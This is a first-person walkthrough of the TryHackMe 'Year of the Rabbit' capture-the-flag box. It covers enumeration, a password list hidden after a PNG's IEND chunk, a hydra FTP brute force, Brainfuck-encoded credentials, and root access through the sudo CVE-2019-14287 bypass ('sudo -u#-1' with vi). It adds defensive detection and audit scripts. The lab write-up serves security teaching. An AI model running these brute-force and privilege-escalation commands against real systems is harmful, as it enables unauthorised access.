Year of the Rabbit - TryHackMe Walkthrough

“Can you hack into the Year of the Rabbit box without falling down a hole? Please ensure your volume is turned up!” This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.

URL: Year of the Rabbit

Difficulty: Medium

Author: MuirlandOracle

Enumeration

We are given the IP 10.10.62.162. Run an nmap scan with the following command:

nmap -p- -A -oN portscan 10.10.62.162

Here are the open ports:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works

Visiting port 80 in the browser shows the default Apache2 page. Let’s use dirb to find other paths in the web root:

dirb http://10.10.62.162/


dirb finds an /assets directory, which contains an irrelevant video and a CSS file.

A quick look at the CSS file reveals this comment:

  /* Nice to see someone checking the stylesheets.
     Take a look at the page: /sup3r_s3cr3t_fl4g.php
  */

Visiting that path prompts us with a message to disable JavaScript, then redirects us to a youtube page:

Rick Astley - Never Gonna Give You Up

Go to about:config in Firefox and set javascript.enabled to false to turn off JS.

Revisiting /sup3r_s3cr3t_fl4g.php now gives this result:

Love it when people block Javascript...
This is happening whether you like it or not... The hint is in the video. If you're stuck here then you're just going to have to bite the bullet!
Make sure your audio is turned up!

If you listen to the video, there is a voice that says “I will put you out of your misery, you are looking in the wrong place” (around 50 seconds in).

Analysing the HTTP request and response for this page reveals something of interest, a reference to a hidden directory:

/intermediary.php?hidden_directory=/WExYY2Cv-qU

Let’s investigate this directory.

/WExYY2Cv-qU/Hot_Babe.png is an image of a woman. I downloaded this image to my local machine and did some basic forensic investigation. I used a tool called exiftool to analyse the metadata:

exiftool Hot_Babe.png


The warning message: [minor] Trailer data after PNG IEND chunk

This refers to bytes appended after the end of the PNG structure: IEND is the last chunk of a valid PNG, so image viewers ignore anything that follows it, which makes the trailer a convenient place to hide data. Let’s use a tool called xxd to look at the hex dump of the file. I always redirect the output to a file called “hex” to make it easier to analyse.

xxd Hot_Babe.png > hex
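Rather than scrolling through a hex dump, the PNG chunk structure itself tells you exactly where legitimate data ends. The following is an added example, not code from the original walkthrough: it walks the chunks of a PNG, returns whatever follows IEND, and lists the printable runs in that trailer the way strings would. The sample PNG and the hidden text inside it are constructed here so the script runs offline; the real Hot_Babe.png is not included.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def iter_png_chunks(data: bytes):
    """Yield (chunk_type, chunk_data, end_offset) for each chunk, stopping after IEND."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        # Each chunk: 4-byte big-endian length, 4-byte type, data, 4-byte CRC.
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start = pos + 8
        end = start + length + 4
        if end > len(data):
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        yield ctype, data[start:start + length], end
        pos = end
        if ctype == b"IEND":
            return
    raise ValueError("no IEND chunk found")


def png_trailer(data: bytes) -> bytes:
    """Return the bytes that follow the IEND chunk (empty for a clean PNG)."""
    end_offset = 0
    for _, _, end_offset in iter_png_chunks(data):
        pass
    return data[end_offset:]


def printable_lines(blob: bytes, min_len: int = 4):
    """Rough equivalent of `strings`: runs of printable ASCII of at least min_len characters."""
    runs, cur = [], bytearray()
    for b in blob:
        if 32 <= b < 127:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                runs.append(cur.decode("ascii"))
            cur = bytearray()
    if len(cur) >= min_len:
        runs.append(cur.decode("ascii"))
    return runs


def make_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Build one PNG chunk; the CRC covers the type and the data, not the length."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_minimal_png(trailer: bytes = b"") -> bytes:
    """Construct a valid 1x1 greyscale PNG, optionally with extra bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, colour type, ...
    idat = zlib.compress(b"\x00\x00")                    # one filter byte plus one pixel
    return (PNG_SIGNATURE + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"IDAT", idat) + make_chunk(b"IEND", b"") + trailer)


# Constructed sample (not the real file): a PNG with a message hidden after IEND.
HIDDEN = (b"Eh, you've earned this. Username for FTP is ftpuser\n"
          b"One of these is the password:\nc4nd1d4t3-one\nc4nd1d4t3-two\n")
SAMPLE_PNG = build_minimal_png(HIDDEN)

if __name__ == "__main__":
    trailer = png_trailer(SAMPLE_PNG)
    print(f"{len(trailer)} trailing bytes after IEND")
    for line in printable_lines(trailer):
        print("  ", line)
```

Running it on a real file is just `png_trailer(open(path, "rb").read())`. A non-empty result is precisely the condition behind exiftool's “Trailer data after PNG IEND chunk” warning, so the same check is a cheap thing to run over uploaded images in an environment where appended payloads are a concern.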

Since the warning mentions the trailer, I looked at the end of the file and found some text:

You can also see the strings with the following command:

strings Hot_Babe.png

There is a hidden message that says:

Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:

This is followed by many lines of strings. I’m assuming one of the trailing strings after these lines is the password for the FTP server. Let’s redirect the strings to a file:

strings Hot_Babe.png > allstrings

Assuming one of the lines of text is the password, we can use them as a wordlist and brute-force the login. Let’s only include the lines after “One of these is the password:” in the wordlist:

sed -n '/^One of these is the password:$/ { :a; n; p; ba; }' allstrings > wordlist

We now have a file called “wordlist” with all of the strings after “One of these is the password:”. We can now construct a hydra command to brute-force the user “ftpuser” against our wordlist to try and gain authorised access.

hydra -V -l ftpuser -P wordlist ftp://10.10.62.162


Using these credentials, let’s explore the ftp server:

ftp 10.10.62.162
ftpuser
5***********Q

There is a .txt file called “Eli’s_Creds.txt”. Transfer this over to your local machine.

get Eli's_Creds.txt
bye


cat Eli\'s_Creds.txt

It looks like encoded data of some sort:

+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <

Based on experience, this looks like an esoteric programming language, in this case Brainfuck.

Esoteric languages

This website can interpret the above program:

Try It Online - tio.run

Go to the Brainfuck interpreter and enter the data:

User: eli
Password: D***********d


Let’s try and SSH using the credentials:

ssh eli@10.10.62.162


We are logged in as “eli”. We have also been presented with a message:

"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"

They mentioned the word “s3cr3t”, which could be a directory name given the way it is spelt. I ran the following command to find a directory with that name on the system:

find / -name s3cr3t -type d 2>/dev/null


There is a file called “.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!” in /usr/games/s3cr3t:


We have some possible credentials:

Gwendoline:M***********I

We have another user called “gwendoline” in the home directory.


Let’s try and change to this user with the provided credentials:

su gwendoline


There is a user.txt: /home/gwendoline/user.txt.

Now we need to escalate our privileges. Try the following command to see what the current user can execute as root:

sudo -l


User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt

This means that gwendoline can run vi on user.txt through sudo, without a password, as any user except root.

Notice how it is (ALL, !root) instead of (ALL, ALL). This is problematic because we can’t use sudo to run the command as root.

This was a difficult part for me because I had no idea how to run vi as root. I couldn’t exploit vi, so I researched ways to exploit sudo. You can find the version of sudo with the following command:

sudo -V


Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3

I eventually found this CVE about exploiting sudo:

Sudo Exploit - ExploitDB

This is a good website explaining the exploit:

cve-2019-14287 - whitesourcesoftware

This is essentially the exploit:

sudo -u#-1

So we can construct the following command to use vi and escalate our privileges:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
:set shell=/bin/sh
:shell
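From the defender’s side, both conditions that made this rule exploitable were already on screen before any exploit was needed: a sudo release older than 1.8.28 (where CVE-2019-14287 was fixed) and a Runas list that grants ALL while subtracting root. The following audit check is an added example, not code from the walkthrough or from the sudo project: it parses the output of `sudo -V` and `sudo -l` rule lines and reports rules that combine the two. The banner and rule strings are constructed to mirror the shape of the output shown above.

```python
import re

# CVE-2019-14287 (the -u#-1 bypass) was fixed in sudo 1.8.28.
FIXED_VERSION = (1, 8, 28, 0)


def parse_sudo_version(banner: str):
    """Extract the version from `sudo -V` output, e.g. '1.8.10p3' -> (1, 8, 10, 3)."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", banner)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def runas_users(rule: str):
    """Return the Runas user list of a `sudo -l` rule line, e.g. ['ALL', '!root']."""
    m = re.match(r"\s*\(([^)]*)\)", rule)
    if not m:
        return []  # no explicit Runas_Spec: sudo defaults to root only
    users = m.group(1).split(":")[0]  # drop an optional group list after ':'
    return [u.strip() for u in users.split(",") if u.strip()]


def rule_allows_all_but_root(rule: str) -> bool:
    """True when the rule grants every target user and relies on '!root' to exclude root."""
    users = runas_users(rule)
    return "ALL" in users and "!root" in users


def cve_2019_14287_exposed(banner: str, rule: str) -> bool:
    """A rule is exposed only when both the vulnerable version and the risky Runas list are present."""
    return parse_sudo_version(banner) < FIXED_VERSION and rule_allows_all_but_root(rule)


def audit(banner: str, rules) -> list:
    """Return the rule lines that a `-u#-1` bypass would turn into root access."""
    return [r for r in rules if cve_2019_14287_exposed(banner, r)]


# Constructed sample input mirroring the shape of the page's `sudo -V` / `sudo -l` output.
SAMPLE_BANNER = "Sudo version 1.8.10p3\nSudoers policy plugin version 1.8.10p3\n"
SAMPLE_RULE = "    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt"
SAFE_RULE = "    (gwendoline) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt"

if __name__ == "__main__":
    for r in audit(SAMPLE_BANNER, [SAMPLE_RULE, SAFE_RULE]):
        print("exposed:", r.strip())
```

The second rule shows the mitigation that does not depend on patching: name the permitted target users explicitly rather than subtracting root from ALL. Upgrading sudo to 1.8.28 or later closes the bypass itself, and the version check above is the quick way to confirm a host has received that fix.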


The last flag is in /root/root.txt.

Written on June 15, 2020